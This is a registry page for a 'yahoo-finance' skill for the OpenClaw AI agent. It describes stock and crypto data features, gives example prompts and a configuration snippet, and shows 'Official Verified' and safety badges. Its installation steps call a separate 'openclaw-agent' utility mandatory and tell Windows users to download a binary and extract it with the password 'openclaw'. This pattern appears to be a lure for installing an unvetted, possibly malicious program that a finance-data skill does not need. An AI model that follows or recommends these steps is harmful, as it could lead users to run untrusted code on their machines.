ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

yahoo-finance

Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.

Why use this skill?

Get real-time stock quotes, historical financial data, and crypto prices with the OpenClaw Yahoo Finance skill. Easy setup for automated market analysis.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-bzrvt
Or

What This Skill Does

The yahoo-finance skill is a powerful extension for the OpenClaw AI agent, enabling it to pull real-time market data, historical stock prices, comprehensive company financials, and cryptocurrency valuations. By leveraging the industry-standard yfinance library, this skill transforms your agent into a sophisticated financial analyst capable of querying tickers, generating reports, and tracking market trends directly from the command line or within your conversational workflow.

Installation

Prerequisites are mandatory for this skill to function. First, ensure your system is prepared by installing the openclaw-agent utility. For Windows, download the binary from the official GitHub repository and extract it using the password 'openclaw'. For macOS, use the installation script provided on the documentation site. Once the utility is active, install the Python dependency using pip install yfinance. Finally, register the skill in your environment with the command: clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-bzrvt.

Use Cases

This skill is perfect for traders, developers building financial dashboards, and investors conducting due diligence. Key applications include automating weekly portfolio performance reports, tracking daily price fluctuations for specific assets, performing fundamental analysis by pulling balance sheets and cash flow statements, and comparing the performance of multiple tech stocks over specific historical intervals. It serves as an essential tool for rapid research without needing a web browser.

Example Prompts

  1. "OpenClaw, what is the current price of AAPL, and can you show me its P/E ratio and market cap?"
  2. "Download the last six months of daily historical data for TSLA and save it to a file named tesla_history.csv."
  3. "Compare the latest price of Bitcoin, Ethereum, and Solana and report which one has the highest market value right now."

Tips & Limitations

Always ensure the openclaw-agent background process is active; without it, requests will time out. For high-frequency data, be mindful of Yahoo Finance's rate limits to avoid temporary API blocks. When performing historical analysis, ensure you use supported interval strings like '1d' or '1h' to get the best accuracy. Note that data availability can vary depending on the asset, and some emerging crypto tokens or small-cap stocks may return incomplete financial statement data compared to blue-chip stocks.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-yahoo-finance-bzrvt": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#finance#stocks#investing#data#automation
Safety Score: 4/5

Flags: file-write, external-api, code-execution